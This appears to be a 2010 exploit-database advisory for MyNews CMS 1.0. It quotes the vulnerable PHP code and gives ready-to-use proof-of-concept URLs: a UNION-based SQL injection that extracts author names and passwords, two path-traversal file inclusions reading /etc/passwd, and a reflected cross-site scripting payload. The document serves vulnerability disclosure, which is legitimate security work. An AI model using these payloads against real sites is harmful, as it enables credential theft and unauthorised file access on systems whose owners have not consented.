MyNews CMS 1.0 - SQL Injection / Local File Inclusion / Cross-Site Scripting

EDB-ID:

12637

CVE:



Author:

mr_me

Type:

webapps


Platform:

PHP

Date:

2010-05-17


MyNews v1.0 CMS - Sql Injection, local file inclusion and XSS Vulnerabilities
Found by: mr_me - http://net-ninja.net/
Advisory: http://www.corelan.be:8800/advisories.php?id=10-040
Dork: "Corelan Security Team"
Homepage: http://mynews.magtrb.com/
Download: http://mynews.magtrb.com/download.php?fname=upload/Versions/MyNews+v1.0.zip
Greetz: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
Notes: 
- Provided 'as is', without any warranty.
- Use for educational purposes only.
- Do not use this to do anything illegal !
- Corelan cannot be held responsible for any damages this may cause.

******************
Sql Injection PoC:
******************

-------[ SNIP ]----------> article.php, line 10
$sql_query = "select id, title, text, views from ".$prefix."_news where id=".$_GET[id]."";
-------[ EOF SNIP ]------>

http://[server]/MyNews/index.php?act=article&id=[ SQLI ]
http://[server]/MyNews/index.php?act=article&id=-12+union+select+1,2,concat(name,0x3a,pwd),4+from+_authors--

********************
File Inclusion PoCs:
********************

-------[ SNIP ]----------> index.php, line 18
if (!isset($_GET['act'])) { $act = 'news'; } else { $act = $_GET['act']; }

include('./includes/header.php');
require('./includes/'.$act.'.php');
-------[ EOF SNIP ]------>

-------[ SNIP ]----------> admin.php, line 65
if(!isset($act)){$act ="index"; }

if($act){include("includes/admin/$act.php");
$smarty->assign("act", $act);
}
-------[ EOF SNIP ]------>

1:
http://[server]/MyNews/index.php?act=[ LFI ]%00&id=12
http://[server]/MyNews/index.php?act=../../../../etc/passwd%00&id=12

2 (requires authentication):
http://[server]/MyNews/admin.php?act=[ LFI ]%00
http://[server]/MyNews/admin.php?act=../../../../etc/passwd%00

*******************
Reflective XSS PoC:
*******************

http://[server]/MyNews/admin.php?act=<script>alert("Found by the Corelan Security Team")</script>